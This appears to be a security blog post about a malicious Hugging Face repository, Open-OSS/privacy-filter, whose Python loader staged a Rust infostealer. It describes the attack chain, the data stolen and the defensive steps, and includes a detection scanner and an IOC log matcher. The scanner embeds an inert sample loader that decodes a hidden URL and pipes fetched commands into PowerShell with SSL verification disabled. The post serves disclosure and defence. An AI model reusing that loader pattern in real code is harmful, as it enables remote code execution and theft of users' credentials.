
May 10, 2026 · 9 min read

The #1 Trending Repository on Hugging Face Last Week Was Not From OpenAI—It Was a Rust Infostealer Disguised as 'Privacy Filter'

HiddenLayer's threat research team disclosed a malicious Hugging Face repository called Open-OSS/privacy-filter that ranked #1 on the platform's trending list with 244,000 downloads. The Python loader inside fetched a Rust infostealer named sefirah that drained browser logins, Discord tokens, crypto wallets, and SSH credentials—then added itself to Microsoft Defender exclusions on the way out.


What Happened

On May 7, 2026, the AI security firm HiddenLayer disclosed a malicious Hugging Face repository hosted under the name Open-OSS/privacy-filter. The repository typosquatted OpenAI's legitimate "Privacy Filter" project, and at the moment of disclosure it was sitting at the top of Hugging Face's trending list with 244,000 reported downloads.

HiddenLayer's analysts noted the download count was almost certainly inflated—padding download metrics is a common technique used by repository attackers to climb trending lists, and 244,000 downloads in days is implausible for a niche AI privacy tool. But even with significant padding, the real victim count is meaningful, because trending placement on Hugging Face is its own multiplier. Engineers and researchers actively browse the trending list looking for new tools. Once a malicious package gets there, the platform itself does the marketing.

Hugging Face removed the repository after HiddenLayer's report. The infostealer payload, which the operators named sefirah, had already done its work on every machine that pulled the package and ran it.

The Loader Chain

The malicious repository looked like a normal Python project on the surface. The bait was a file named loader.py that any user reading the README and following the install instructions would run. Inside, the script executed a clean, well-rehearsed staging chain:

  1. SSL verification disabled. Before any network call, the script replaced Python's default HTTPS context with an unverified one. From then on the loader accepted whatever certificate the staging host presented, so the operators could serve the next stage behind a self-signed or mismatched certificate and move hosts without ever obtaining a trusted one.
  2. Base64 decoded URL. The next-stage URL was hidden as a base64 blob. Static scanners that grep source files for suspicious hostnames miss anything that has been base64-encoded.
  3. JSON payload fetch. The script downloaded a JSON document containing PowerShell commands. JSON is innocuous; PowerShell delivered through JSON is a way to keep the initial Python file clean of obviously malicious strings.
  4. start.bat dropped and executed. The PowerShell commands wrote and ran a Windows batch file that performed privilege escalation and added the final payload directory to Microsoft Defender's exclusion list.
  5. sefirah deployed. With Defender out of the way, the Rust infostealer ran with elevated privileges and reached out to recargapopular[.]com for command and control.

Each step in the chain removes a different obstacle: certificate checks on the staging fetch, static scanning of the loader file, string-based detection of the second stage, and Defender on the endpoint. None of the techniques are novel. What is novel is shipping the chain through Hugging Face and getting trending placement before anyone notices.
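The three source-level indicators in that chain (an unverified SSL context, a base64 literal that decodes to a URL, and a subprocess call that hands work to PowerShell) are all visible to a static pass over the loader file. The script below is an added example, not HiddenLayer's tooling and not code from the Open-OSS/privacy-filter repository: it parses a Python file with the standard library ast module and reports each indicator with its line number. The sample loader at the bottom is constructed for the example and inert; it points at a reserved .invalid hostname and is only parsed, never executed.

```python
"""Static triage for Python loaders that follow the staging chain described above.

Added example (not HiddenLayer's code). Flags three indicators in Python source:
  * SSL verification disabled (unverified context, check_hostname = False, verify=False)
  * base64 string literals that decode to a URL
  * subprocess/os calls whose arguments name PowerShell
"""
from __future__ import annotations

import ast
import base64
import binascii
import re

# Decoded bytes must look like a complete URL made of printable ASCII only.
URL_RE = re.compile(rb"^https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[!-~]*)?$")
# Candidate base64 literal: only the base64 alphabet, long enough to hold a URL.
B64_RE = re.compile(r"^[A-Za-z0-9+/=]{16,}$")
# Functions that hand a string to the OS shell or a child process.
EXEC_FUNCS = ("subprocess.", "os.system", "os.popen", "os.spawn")


def _decoded_url(literal: str) -> str | None:
    """Return the URL hidden in a base64 literal, or None if it is not one."""
    if not B64_RE.match(literal):
        return None
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("ascii") if URL_RE.match(raw) else None


def _names_powershell(call: ast.Call) -> bool:
    """True if any string literal among the call's arguments mentions PowerShell."""
    for arg in call.args:
        for sub in ast.walk(arg):
            if (isinstance(sub, ast.Constant) and isinstance(sub.value, str)
                    and "powershell" in sub.value.lower()):
                return True
    return False


def triage_loader(source: str) -> list[tuple[int, str, str]]:
    """Scan Python source text; return (line, indicator, detail) sorted by line."""
    findings: list[tuple[int, str, str]] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr == "_create_unverified_context":
            findings.append((node.lineno, "ssl-verify-disabled", "ssl._create_unverified_context"))
        elif (isinstance(node, ast.Assign)
              and any(isinstance(t, ast.Attribute) and t.attr == "check_hostname" for t in node.targets)
              and isinstance(node.value, ast.Constant) and node.value.value is False):
            findings.append((node.lineno, "ssl-verify-disabled", "check_hostname = False"))
        elif isinstance(node, ast.Call):
            for kw in node.keywords:  # requests-style verify=False
                if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                    findings.append((node.lineno, "ssl-verify-disabled", "verify=False"))
            func_name = ast.unparse(node.func)
            if func_name.startswith(EXEC_FUNCS) and _names_powershell(node):
                findings.append((node.lineno, "powershell-exec", func_name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = _decoded_url(node.value)
            if url:
                findings.append((node.lineno, "base64-url", url))
    return sorted(findings)


# Constructed sample with the same shape as the chain in the write-up. The blob
# decodes to https://staging.example.invalid/cfg.json (a reserved, unroutable name).
SAMPLE_LOADER = '''
import base64, json, ssl, subprocess, urllib.request

ssl._create_default_https_context = ssl._create_unverified_context

url = base64.b64decode("aHR0cHM6Ly9zdGFnaW5nLmV4YW1wbGUuaW52YWxpZC9jZmcuanNvbg==").decode()
cfg = json.load(urllib.request.urlopen(url))
subprocess.run(["powershell", "-NoProfile", "-Command", cfg["cmd"]], check=False)
'''

if __name__ == "__main__":
    for line, kind, detail in triage_loader(SAMPLE_LOADER):
        print(f"line {line}: {kind}: {detail}")
```

Point it at a real file with `triage_loader(open(path).read())` before running anything from a freshly cloned repository. Any one indicator can be legitimate on its own; all three in a short loader, with the decoded URL pointing somewhere other than the project's own infrastructure, is the shape to stop on.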

What sefirah Actually Steals

Once running, sefirah behaves like a modern Rust infostealer: fast, broad, and quiet. The targets HiddenLayer documented include:

  • Browser credentials from Chromium based browsers (Chrome, Edge, Brave, Opera) and Firefox. That covers saved passwords and cookies.
  • Discord tokens. A stolen token gives the attacker direct access to the account without the password or 2FA, because Discord accepts the token as proof of login until it is invalidated, typically by a password change.
  • Cryptocurrency wallets. Both browser extension wallets (MetaMask, Phantom, and the rest) and standalone desktop wallet files. A single seed phrase from a developer's machine is enough to drain whatever balance is in it.
  • SSH, FTP, and VPN credentials. The private keys and client configs most developers leave on disk for SSH, saved site profiles from SFTP clients like FileZilla, and VPN profiles. These are the credentials that reach beyond the developer's own laptop into production infrastructure.
  • Screenshots and system fingerprints. Screenshots of the desktop at moment of compromise help operators triage which infections are valuable enough to follow up on by hand.

The Rust implementation is part of a broader 2026 trend. Operators are moving infostealers from C++ and .NET to Rust because Rust binaries are still poorly covered by signature-based AV, and reverse engineering them is meaningfully harder. The same shift is visible in PCPJack's credential stealer code and across the Russian-speaking infostealer ecosystem.

Why Hugging Face Matters as a Distribution Channel

Hugging Face has become the default registry for AI models and tooling. It now plays the role npm plays for JavaScript and PyPI plays for Python: a place where developers reflexively search for what they need, install whatever shows up, and run it locally. Trust is implicit because the platform is the well-known one in the space.

That implicit trust is the attack surface. Hugging Face's content review for new repositories is light by design—the platform exists to make it as easy as possible for researchers to publish models—and the trending list is driven by metrics that an attacker can pad. The combination is exactly the shape that npm has been suffering from for years and that drove campaigns like TeamPCP's supply chain attack on Checkmarx, Bitwarden, and Trivy.

The fake OpenAI angle is the lure that distinguishes this campaign. Developers actively want OpenAI tooling and adjacent privacy projects, and they will install a typosquatted version without checking the org name closely. The same dynamic produced last week's fake Claude AI site pushing the Beagle trojan and the ClawHavoc AI assistant infostealer supply chain—the AI ecosystem's brand value is now the operator's preferred costume.

Why Compromised Developers Are an Email Problem

A developer infected with sefirah is not just a person whose own data is gone. The infostealer harvests browser cookies, which include authenticated sessions for the developer's email, GitHub, GitLab, AWS console, internal admin tools, and customer support systems. Cookies bypass passwords and 2FA—they are, by design, what the browser presents to a logged in service in lieu of credentials.

Operators who buy stolen cookies on the secondary market are specifically looking for active sessions in services that talk to other people. A live Gmail or Outlook session inside a corporate tenant is an entry point for business email compromise—the attacker can read the inbox, find a pending wire transfer, and reply in the victim's voice. A live customer support session is an entry point for the kind of phishing campaigns that use legitimate retailer infrastructure to send authenticated mail to customers.

Every browser cookie sefirah ships out is a candidate for that follow on. The 244,000 download number includes both real victims and inflated metrics, but a single compromised developer at the right firm is sufficient to seed a downstream phishing campaign that costs a company millions.

Defensive Steps

For developers, security teams, and anyone whose laptop ran the loader:

  • Reimage compromised machines. A Rust infostealer with Defender exclusions in place is not safe to clean with a single AV scan. The HiddenLayer guidance is to wipe and reinstall. Before the wipe, record the exclusion path the batch file added; any other machine in the fleet carrying the same exclusion is a candidate victim.
  • Rotate every credential the browser had access to. Email, GitHub, cloud consoles, internal admin panels. Treat saved passwords as published and any active session token as compromised. Force a logout of all sessions in identity providers.
  • Move crypto wallets to fresh seeds on a clean device. If a browser extension wallet was on the affected machine, the seed phrase is in the operator's hands.
  • Review SSH keys, FTP profiles, and VPN configurations for evidence of lateral access. Revoke and reissue keys at the bastion or directory layer.
  • Block recargapopular[.]com at egress and add the domain plus the loader script's IOCs to detection rules.
  • For org-wide policy: require code review on any new dependency added from Hugging Face, npm, or PyPI. Trending placement is not a substitute for provenance, and small developer teams that adopt new AI tooling weekly are the ones a campaign like this is sized to catch.
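The egress block and the detection rule are only as good as the indicator handling behind them. The script below is an added example, not HiddenLayer's or Hugging Face's tooling: it refangs the C2 indicator the way write-ups defang it (`recargapopular[.]com`, `hxxps://`), builds one matcher that catches the domain and any subdomain of it while rejecting lookalikes that merely contain the string, and runs it over resolver and proxy log lines. The log lines are constructed for the example; the log format is an assumption, not a product's actual output.

```python
"""Refang a defanged C2 indicator and hunt for it in DNS and proxy logs.

Added example (not HiddenLayer's code). Edge cases handled on purpose:
  * subdomains of the indicator (api.recargapopular.com) are hits
  * a trailing FQDN dot in resolver logs (recargapopular.com.) is a hit
  * notrecargapopular.com and recargapopular.com.other.test are NOT hits
"""
import re

DEFANG_MAP = [("[.]", "."), ("(.)", "."), ("[:]", ":"), ("hxxps://", "https://"), ("hxxp://", "http://")]


def refang(ioc: str) -> str:
    """Undo the common defanging conventions and normalise case."""
    for bad, good in DEFANG_MAP:
        ioc = ioc.replace(bad, good)
    return ioc.lower()


def domain_matcher(defanged_domains) -> re.Pattern:
    """Compile one regex matching each domain, or any subdomain, as a whole hostname."""
    alts = "|".join(re.escape(refang(d)) for d in defanged_domains)
    return re.compile(
        r"(?<![A-Za-z0-9.-])"          # hostname must start here, not inside another label
        r"(?:[A-Za-z0-9-]+\.)*"        # any number of subdomain labels
        rf"(?:{alts})"                 # the indicator itself
        r"(?!\.?[A-Za-z0-9-])",        # not followed by more labels (a bare FQDN dot is fine)
        re.IGNORECASE,
    )


def scan_lines(lines, matcher: re.Pattern) -> list[tuple[str, str]]:
    """Return (matched hostname, full log line) for every line that hits."""
    hits = []
    for line in lines:
        m = matcher.search(line)
        if m:
            hits.append((m.group(0).lower(), line))
    return hits


# Constructed log lines (format is an assumption for the example).
LOG_LINES = [
    "2026-05-08T14:02:11Z resolver query 10.20.4.17 A recargapopular.com.",
    "2026-05-08T14:02:12Z proxy 10.20.4.17 CONNECT api.recargapopular.com:443 200",
    "2026-05-08T14:02:13Z resolver query 10.20.4.17 A pypi.org.",
    "2026-05-08T14:02:14Z resolver query 10.20.4.17 A recargapopular.com.evil-lookalike.test.",
    "2026-05-08T14:02:15Z resolver query 10.20.4.22 A notrecargapopular.com.",
]

if __name__ == "__main__":
    c2 = domain_matcher(["recargapopular[.]com"])
    for host, line in scan_lines(LOG_LINES, c2):
        print(f"HIT {host}: {line}")
```

The same `domain_matcher` output can seed a DNS sinkhole or proxy deny rule; the point of the subdomain and lookalike handling is that a rule built from a naive string match either misses `api.` hosts or fires on every domain that happens to contain the indicator.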

The Pattern

The Open-OSS/privacy-filter campaign is the same playbook that has been running on npm and PyPI for three years, ported to the AI ecosystem's most trusted registry. The economics are favorable for the attacker: low cost to publish, low scrutiny on submission, and a ranking algorithm that can be padded into a top slot. The defensive economics are not. Every developer is one curl pipe to bash away from running a loader, and AI tooling is moving fast enough that even careful engineers install things they have not vetted.

Hugging Face is not the last platform this will happen on. Whatever registry hosts the next wave of agent frameworks is being scouted by the same operators today. The defensive lesson is not "do not use Hugging Face." It is to assume that any package registry which optimizes for ease of publication will eventually be one of these stories—and to harden the steps after a malicious dependency has already been pulled.
